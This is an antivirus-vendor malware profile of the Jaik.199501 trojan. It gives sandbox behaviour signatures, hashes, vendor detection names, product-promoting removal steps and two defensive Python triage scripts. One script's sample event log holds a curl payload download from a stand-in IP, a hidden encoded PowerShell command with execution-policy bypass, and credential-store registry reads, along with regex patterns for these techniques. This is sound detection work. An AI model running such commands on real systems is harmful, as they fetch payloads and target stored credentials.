
What is “Jaik.199501”?


Jaik.199501 is a detection name that nearly every antivirus vendor classifies as malicious (the full list of vendor verdicts is given further down). When the infection is active you may notice unfamiliar processes in the Task Manager list. In that case it is advisable to scan the computer with GridinSoft Anti-Malware.

GridinSoft Anti-Malware

Removing PC viruses manually may take hours and may damage your PC in the process. We recommend using GridinSoft Anti-Malware for virus removal; it lets you run a complete scan and clean the PC during the trial period.
6-day free trial available.

What can the Jaik.199501 virus do?

Behaviour signatures the CAPE sandbox raised while running the sample:

  • Behavioural detection: Executable code extraction – unpacking
  • Connects to crypto currency mining pool
  • A file was accessed within the Public folder.
  • Uses Windows utilities for basic functionality
  • Uses the cURL utility, most likely to download a file
  • CAPE extracted potentially suspicious content
  • An HTTP/S link was seen in a script or command line
  • The binary likely contains encrypted or compressed data.
  • Authenticode signature is invalid
  • A scripting utility was executed
  • Accessed credential storage registry keys
  • Deletes executed files from disk
  • The sample wrote data to the system hosts file.
  • Attempts to execute suspicious powershell command arguments
  • Uses suspicious command line tools or Windows utilities
  • Yara rule detections observed from a process memory dump/dropped files/CAPE
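
Several of the signatures above can be reproduced as simple rules over the process, file and registry events a sandbox records. The script below is an added example, not CAPE's own signature code and not anything taken from the analysed sample: the event log is constructed, the URL uses an RFC 5737 documentation address, and the patterns (including the credential-store registry keys) are this example's own approximations of the signature names. The "deletes executed files" check is the one rule that needs state, since it has to correlate a `del` command with an image that ran earlier in the same trace.

```python
"""Rule-based triage over sandbox-style events, approximating several of the
behaviour signatures listed above (suspicious PowerShell arguments, cURL
download, HTTP link in a command line, Public-folder access, hosts-file write,
credential-storage registry access, deleting an executed file).
Added example; not CAPE's own signature code. All events are constructed."""
import re
from typing import Dict, List, NamedTuple, Optional


class Event(NamedTuple):
    kind: str    # "process" (command line), "file_write" (path) or "reg_read" (key)
    value: str


# Constructed event log in the shape a sandbox would record; not from the page.
# 203.0.113.5 is a documentation address (RFC 5737), not a real server.
SAMPLE_EVENTS = [
    Event("process", r'"C:\Users\Public\setup.exe"'),
    Event("process", r'curl.exe -s -o C:\Users\Public\upd.dat http://203.0.113.5/upd.dat'),
    Event("process", r'powershell.exe -NoProfile -WindowStyle Hidden '
                     r'-ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAuAC4ALgA='),
    Event("reg_read", r'HKLM\SECURITY\Policy\Secrets'),
    Event("file_write", r'C:\Windows\System32\drivers\etc\hosts'),
    Event("process", r'cmd.exe /c del /f /q "C:\Users\Public\setup.exe"'),
]

# (event kind, pattern) per signature. The patterns are this example's own
# approximations of the signature names, not CAPE's rule definitions.
RULES = {
    "suspicious_powershell_args": ("process", re.compile(
        r"\bpowershell(?:\.exe)?\b.*?(?:-nop(?:rofile)?\b|-w(?:indowstyle)?\s+hidden"
        r"|-e(?:p|xecutionpolicy)\s+bypass|-e(?:nc|ncodedcommand)?\b"
        r"|\biex\b|downloadstring|frombase64string)", re.I)),
    "scripting_utility_executed": ("process", re.compile(
        r"\b(?:powershell|wscript|cscript|mshta)(?:\.exe)?\b", re.I)),
    "curl_download": ("process", re.compile(r"\bcurl(?:\.exe)?\b.*https?://", re.I)),
    "http_link_in_command_line": ("process", re.compile(r"https?://", re.I)),
    "public_folder_access": ("process", re.compile(r"\\Users\\Public\\", re.I)),
    "writes_hosts_file": ("file_write", re.compile(r"\\drivers\\etc\\hosts$", re.I)),
    "credential_storage_keys": ("reg_read", re.compile(
        r"\\SAM\b|\\SECURITY\\Policy\\Secrets|Protected Storage System Provider", re.I)),
}


def image_of(cmdline: str) -> Optional[str]:
    """First token of a command line (quoted or bare), lower-cased."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)).lower() if m else None


def detect(events: List[Event]) -> Dict[str, List[str]]:
    """Return {signature: [matching event values]} for an event list."""
    hits: Dict[str, List[str]] = {}
    executed = set()  # images started earlier, for the delete-after-run check
    for ev in events:
        for name, (kind, rx) in RULES.items():
            if ev.kind == kind and rx.search(ev.value):
                hits.setdefault(name, []).append(ev.value)
        if ev.kind == "process":
            img = image_of(ev.value)
            # "Deletes executed files": a del command naming an image that ran
            # earlier in this trace (the deleting process itself is excluded).
            if re.search(r"\bdel\b", ev.value, re.I):
                if any(p in ev.value.lower() for p in executed - {img}):
                    hits.setdefault("deletes_executed_files", []).append(ev.value)
            if img:
                executed.add(img)
    return hits


if __name__ == "__main__":
    for sig, values in detect(SAMPLE_EVENTS).items():
        print(f"{sig}: {len(values)} event(s)")
```

Run stand-alone it prints one line per signature that fired on the constructed trace; `detect` is the only entry point, so the same rules can be pointed at real sandbox output by building `Event` objects from it.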

How to identify Jaik.199501?

Jaik.199501 is a generic family name, so the reliable way to tell whether a file is this sample is to compare its hashes with the ones recorded below. The ssdeep and tlsh values are fuzzy hashes and, together with the entry-point bytes, help to spot near-variants that share code but differ in exact hash.

File Info:

name: 153D1BFE67F97BF1753D.mlw
path: /opt/CAPEv2/storage/binaries/1bafee36c20624bd9219e8dd43d4e75de4d3854c693ecff39f52bbeb7ea2feb0
crc32: 313265BF
md5: 153d1bfe67f97bf1753d333642aaca15
sha1: 74a83b2a50b574144d5cca33ac7544b822055b39
sha256: 1bafee36c20624bd9219e8dd43d4e75de4d3854c693ecff39f52bbeb7ea2feb0
sha512: ac64e8141a9d4792dd0b26cb215475739ddfb89ce482b94c4d61e4909fac64acea3e1bb70ee46a6f4460f50a10866c07959fde2c33f0dde0cbd0fc95941e7889
ssdeep: 196608:a3dxfgH7lvhty6qwt6X4bQr14HHwLTDmtQm5rq:a3dRgbjtZqwtuPGnw/yT2
type: PE32 executable (GUI) Intel 80386, for MS Windows
tlsh: T13E56230337918026FF9BA1734F5AF66197BCA9560123A52F13581CBABD702B1473E7A3
sha3_384: e9ccd73957b8548f9e3777573e6dbce31d30dd04948e3b584447f6f174b9a55572372f3b75a380ab5e1d5fb832d72a69
ep_bytes: e86e050000e97afeffff558bec56ff75
timestamp: 2023-11-15 23:08:45

Version Info:

Translation: 0x0809 0x04b0 (language ID 0x0809 = English (United Kingdom), code page 0x04b0 = 1200 = Unicode)
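
To check a file on disk against this record, compute the same digests and read the static PE fields the sandbox reports (file type, entry-point bytes, build timestamp). The script below is an added example, not GridinSoft's or CAPE's code. `JAIK_199501_IOCS` and `EP_BYTES_HEX` are copied from the File Info section; the PE stub that `build_sample_pe` produces is a constructed, non-functional stand-in used only so the script can exercise itself offline; and treating the reported timestamp as UTC is an assumption.

```python
"""Compute the hashes the File Info section lists and pull the static PE
fields it reports (file type, entry-point bytes, TimeDateStamp) so a file on
disk can be checked against these indicators. Added example; not GridinSoft's
or CAPE's code. The PE image built at the bottom is a constructed stand-in."""
import hashlib
import struct
import zlib
from datetime import datetime, timezone

# Indicators copied from the File Info section above.
JAIK_199501_IOCS = {
    "md5": "153d1bfe67f97bf1753d333642aaca15",
    "sha1": "74a83b2a50b574144d5cca33ac7544b822055b39",
    "sha256": "1bafee36c20624bd9219e8dd43d4e75de4d3854c693ecff39f52bbeb7ea2feb0",
}
EP_BYTES_HEX = "e86e050000e97afeffff558bec56ff75"


def hash_bytes(data: bytes) -> dict:
    """Same digest set as the File Info section."""
    return {
        "crc32": "%08X" % (zlib.crc32(data) & 0xFFFFFFFF),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
        "sha3_384": hashlib.sha3_384(data).hexdigest(),
    }


def match_iocs(hashes: dict, iocs: dict) -> set:
    """Names of the digests that equal a listed indicator (case-insensitive)."""
    return {k for k, v in iocs.items() if hashes.get(k, "").lower() == v.lower()}


def parse_pe(data: bytes) -> dict:
    """Minimal PE reader: format, machine, subsystem, TimeDateStamp, EP bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    ep_rva = struct.unpack_from("<I", data, opt + 16)[0]    # AddressOfEntryPoint
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]  # same offset in PE32/PE32+
    ep_off = None
    for i in range(nsect):  # map the EP RVA to a file offset via the section table
        _, vsize, vaddr, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        if vaddr <= ep_rva < vaddr + max(vsize, rawsize):
            ep_off = rawptr + (ep_rva - vaddr)
            break
    if ep_off is None:
        raise ValueError("entry point is outside every section")
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown")
    arch = {0x14C: "Intel 80386", 0x8664: "x86-64"}.get(machine, hex(machine))
    ui = {2: "GUI", 3: "console"}.get(subsystem, str(subsystem))
    return {
        "type": f"{fmt} executable ({ui}) {arch}",
        "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "ep_bytes": data[ep_off:ep_off + 16].hex(),
    }


def build_sample_pe(ep_bytes: bytes, timestamp: int) -> bytes:
    """Constructed PE32 stub (headers + one .text section); it does not run."""
    align = 0x200
    opt = bytearray(224)                              # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)             # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x1000)           # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)         # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, align)   # Section/File alignment
    struct.pack_into("<H", opt, 68, 2)                # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)               # NumberOfRvaAndSizes
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, len(opt), 0x102)
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(ep_bytes), 0x1000,
                       align, align, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + bytes(opt) + sect
    headers += bytes(align - len(headers))
    return headers + ep_bytes + bytes(align - len(ep_bytes))


# Timestamp from the File Info section, taken as UTC (an assumption).
SAMPLE_TS = int(datetime(2023, 11, 15, 23, 8, 45, tzinfo=timezone.utc).timestamp())


def triage(data: bytes) -> dict:
    """Hashes, IOC matches and static PE fields for one file image."""
    h = hash_bytes(data)
    return {"hashes": h, "ioc_matches": match_iocs(h, JAIK_199501_IOCS), **parse_pe(data)}


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else \
        build_sample_pe(bytes.fromhex(EP_BYTES_HEX), SAMPLE_TS)
    for k, v in triage(blob).items():
        print(f"{k}: {v}")
```

Run with a path argument to triage a real file; without one it triages the constructed stub, whose entry-point bytes, type string and timestamp reproduce the values in the File Info section while its hashes, as expected, match none of the indicators.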

Jaik.199501 also known as:

Jaik.199501 is the name given by the BitDefender engine and by products that license it (Gen:Variant.Jaik.199501); other vendors give the same file their own names, and those names do not even agree on the architecture (Win32 versus Win64, while the file type above is PE32, i.e. 32-bit). Vendor and detection name for this sample:

Bkav: W32.AIDetectMalware
Lionic: Trojan.Win64.Injects.ts93
Elastic: malicious (high confidence)
MicroWorld-eScan: Gen:Variant.Jaik.199501
FireEye: Generic.mg.153d1bfe67f97bf1
Skyhigh: BehavesLike.Win32.Generic.vc
ALYac: Gen:Variant.Jaik.199501
Cylance: unsafe
Sangfor: Trojan.Win32.Save.a
K7AntiVirus: Trojan ( 005af7651 )
Alibaba: Trojan:Win32/Povertel.638d56ed
K7GW: Trojan ( 005af7651 )
Cybereason: malicious.a50b57
Arcabit: Trojan.Jaik.D30B4D
Symantec: ML.Attribute.HighConfidence
tehtris: Generic.Malware
ESET-NOD32: a variant of Win64/Agent_AGen.BDJ
Cynet: Malicious (score: 100)
APEX: Malicious
Kaspersky: Trojan.Win32.Povertel.csi
BitDefender: Gen:Variant.Jaik.199501
NANO-Antivirus: Trojan.Win32.Povertel.kdxloe
Avast: Win64:Evo-gen [Trj]
Tencent: Win32.Trojan.Povertel.Wmhl
Ad-Aware: Gen:Variant.Jaik.199501
Emsisoft: Gen:Variant.Jaik.199501 (B)
F-Secure: Heuristic.HEUR/AGEN.1366653
DrWeb: Trojan.Siggen22.10492
VIPRE: Gen:Variant.Jaik.199501
TrendMicro: TROJ_GEN.R002C0XKG23
Trapmine: malicious.moderate.ml.score
Sophos: Mal/Generic-S
Ikarus: Trojan.PS.Agent
Jiangmin: Trojan.Script.awbz
Varist: W64/ABRisk.NAKC-2918
Avira: HEUR/AGEN.1366653
Antiy-AVL: Trojan/Win32.Wacatac
Microsoft: Trojan:Win32/Wacatac.B!ml
ZoneAlarm: Trojan.Win32.Povertel.csi
GData: Gen:Variant.Jaik.199501
Google: Detected
AhnLab-V3: Trojan/Win.Generic.R628666
McAfee: Artemis!153D1BFE67F9
MAX: malware (ai score=87)
VBA32: BScope.Trojan.Script
Malwarebytes: Trojan.Dropper.AutoIt
Panda: Trj/Chgt.AD
TrendMicro-HouseCall: TROJ_GEN.R002C0XKG23
Rising: Trojan.Agent!8.B1E (CLOUD)
SentinelOne: Static AI – Malicious PE
MaxSecure: Trojan.Malware.220497719.susgen
Fortinet: W32/Agent_AGen.AYF!tr
AVG: Win64:Evo-gen [Trj]
DeepInstinct: MALICIOUS
CrowdStrike: win/malicious_confidence_100% (W)

How to remove Jaik.199501?

Jaik.199501 removal tool
  • Download and install GridinSoft Anti-Malware.
  • Open GridinSoft Anti-Malware and perform a “Standard scan”.
  • “Move to quarantine” all detected items.
  • Open the “Tools” tab and press “Reset Browser Settings”.
  • Select the proper browser and options, then click “Reset”.
  • Restart your computer.

About the author

Paul Valéry

I'm a cyber security analyst and data science expert with 5+ years of experience with security software contractors.
